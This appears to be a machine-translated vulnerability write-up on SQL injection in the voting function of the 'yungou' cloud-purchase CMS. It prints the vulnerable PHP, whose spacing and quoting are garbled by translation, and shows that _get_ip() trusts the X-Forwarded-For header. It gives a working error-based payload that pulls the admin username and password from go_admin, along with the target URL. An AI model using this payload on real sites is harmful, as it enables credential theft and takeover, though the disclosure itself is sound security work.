Improper repair of cloud-purchased Cms still causes SQL Injection

Improper repair of cloud-purchased Cms still causes SQL Injection

I have read the code at the same location.

Public function checked_option () {$ mysql_model = System: load_sys_class ('model'); $ title = "Vote"; $ curtime = time (); $ option_id = abs (intval ($ _ POST ['Radio ']); $ vote_id = abs (intval ($ _ POST ['vote _ id']); $ clientip = _ get_ip (); $ sqlallowguest = ''; $ sqlinterval = 0; // query the voting item rules and the specified time $ vote_subjects = $ mysql_model-> GetOne ("select * from '@ # _ vote_subject 'where 'vote _ id' =' $ vote_id' "); $ sqlallowguest = $ vote_subjects ['vote _ Llowguest ']; // 1 allows visitors to vote 0 does not allow visitors to vote $ sqlinterval = $ vote_subjects ['vote _ interval']; // you can vote again in N days, 0 indicates that this IP address can only be cast once if (1 = $ sqlallowguest) {// determine whether a visitor is allowed to vote $ vote_activer = $ mysql_model-> GetOne ("select * from '@ # _ vote_activer 'where 'vote _ id' =' $ vote_id 'and' ip '=' $ clientip' order by subtime desc "); if (! Empty ($ vote_activer) {// determines whether the ip user has voted for the ip address. // The number of days before the last vote $ datenum = ($ curtime-$ vote_activer ['subtime']) /(60*60*24); if ($ sqlinterval = 0 | $ datenum <= $ sqlinterval) {// 0 indicates that this IP address can only be cast once _ message ("You have participated in this voting activity", null, 3 );} else {// query the new ticket count $ vote_option = $ mysql_model-> GetList ("select * from '@ # _ vote_option 'where' option _ id' =' $ option_id '" ); $ option_number = $ vote_option [0] ['option _ number'] + 1; $ mysql_model-> Query ("Update '@# _ Vote_option 'set option_number = '$ option_number' where 'vote _ id' = '$ vote_id' and 'option _ id' = '$ option_id '"); $ mysql_model-> Query ("insert into '@ # _ vote_activer' (option_id, vote_id, userid, ip, subtime) VALUES ('$ option_id', '$ vote_id ', '$ this-> userid',' $ clientip ',' $ curtime') "); _ message (" voting successful, thank you for your participation ", null, 3) ;}} else {// check the newly added ticket count $ vote_option = $ mysql_model-> GetList ("select * from '@ # _ vote_option 'where' op Tion_id '=' $ option_id '"); $ option_number = $ vote_option [0] ['option _ number'] + 1; $ mysql_model-> Query ("Update' @ # _ vote_option 'set option_number = '$ option_number' where 'vote _ id' = '$ vote_id' and 'option _ id' =' $ option_id '"); $ mysql_model-> Query ("insert into '@ # _ vote_activer' (option_id, vote_id, userid, ip, subtime) VALUES ('$ option_id', '$ vote_id ', '$ this-> userid',' $ clientip ',' $ curtime') "); _ message (" the vote is successful. Thank you for your reference. And ", null, 3) ;}} else {if ($ this-> userid ='') {_ message ("You do not have permission to vote. Please log on and vote! ", Null, 3); exit ();} $ vote_activer = $ mysql_model-> GetOne ("select * from '@ # _ vote_activer' where 'vote _ id' = '$ vote_id' and 'userid' = '$ this-> userid '"); if (! Empty ($ vote_activer) {// determines whether the user has voted. // The number of days before the last vote. $ datenum = ($ curtime-$ vote_activer ['subtime']) /(60*60*24); if ($ sqlinterval = 0 | $ datenum <= $ sqlinterval) {// 0 indicates that this IP address can only be cast once _ message ("You have participated in this voting activity", null, 3 );} else {// query the new ticket count $ vote_option = $ mysql_model-> GetList ("select * from '@ # _ vote_option 'where' option _ id' =' $ option_id '" ); $ option_number = $ vote_option [0] ['option _ number'] + 1; $ mysql_model-> Query ("Update' @ # _ vote_option 'set option_number = '$ option_number' where 'vote _ id' = '$ vote_id' and 'option _ id' =' $ option_id '"); $ mysql_model-> Query ("insert into '@ # _ vote_activer' (option_id, vote_id, userid, ip, subtime) VALUES ('$ option_id', '$ vote_id ', '$ this-> userid',' $ clientip ',' $ curtime') "); _ message (" voting successful, thank you for your participation ", null, 3 );}} else {// query the new ticket count $ vote_option = $ mysql_model-> GetList ("select * from '@ # _ vote_option 'where' option _ id' =' $ option_id '" ); $ option_number = $ vote_option [0] ['option _ number'] + 1; $ mysql_model-> Query ("Update' @ # _ vote_option 'set option_number = '$ option_number' where 'vote _ id' = '$ vote_id' and 'option _ id' =' $ option_id '"); $ mysql_model-> Query ("insert into '@ # _ vote_activer' (option_id, vote_id, userid, ip, subtime) VALUES ('$ option_id', '$ vote_id ', '$ this-> userid',' $ clientip ',' $ curtime') "); _ message (" voting successful, thank you for your participation ", null, 3 );}}

$clientip=_get_ip()

Let's look at the _ get_ip () function.



/* Obtain the Client ip Address */

function _get_ip(){if (isset($_SERVER['HTTP_CLIENT_IP']) && strcasecmp($_SERVER['HTTP_CLIENT_IP'], "unknown")) $ip = $_SERVER['HTTP_CLIENT_IP']; else if (isset($_SERVER['HTTP_X_FORWARDED_FOR']) && strcasecmp($_SERVER['HTTP_X_FORWARDED_FOR'], "unknown")) $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; else if (isset($_SERVER['REMOTE_ADDR']) && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) $ip = $_SERVER['REMOTE_ADDR']; else if (isset($_SERVER['REMOTE_ADDR']) && isset($_SERVER['REMOTE_ADDR']) && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) $ip = $_SERVER['REMOTE_ADDR']; else $ip = ""; return ($ip);}

Change xff to 1.1.1.1 'or updatexml (1, concat (0x5e24, (select concat (username, 0x23, userpass) from go_admin limit 0, 1), 0x5e24), 1) or'

After logging on, open http: // localhost/yungou /? /Vote/checked_option
 

 

Solution:

Escape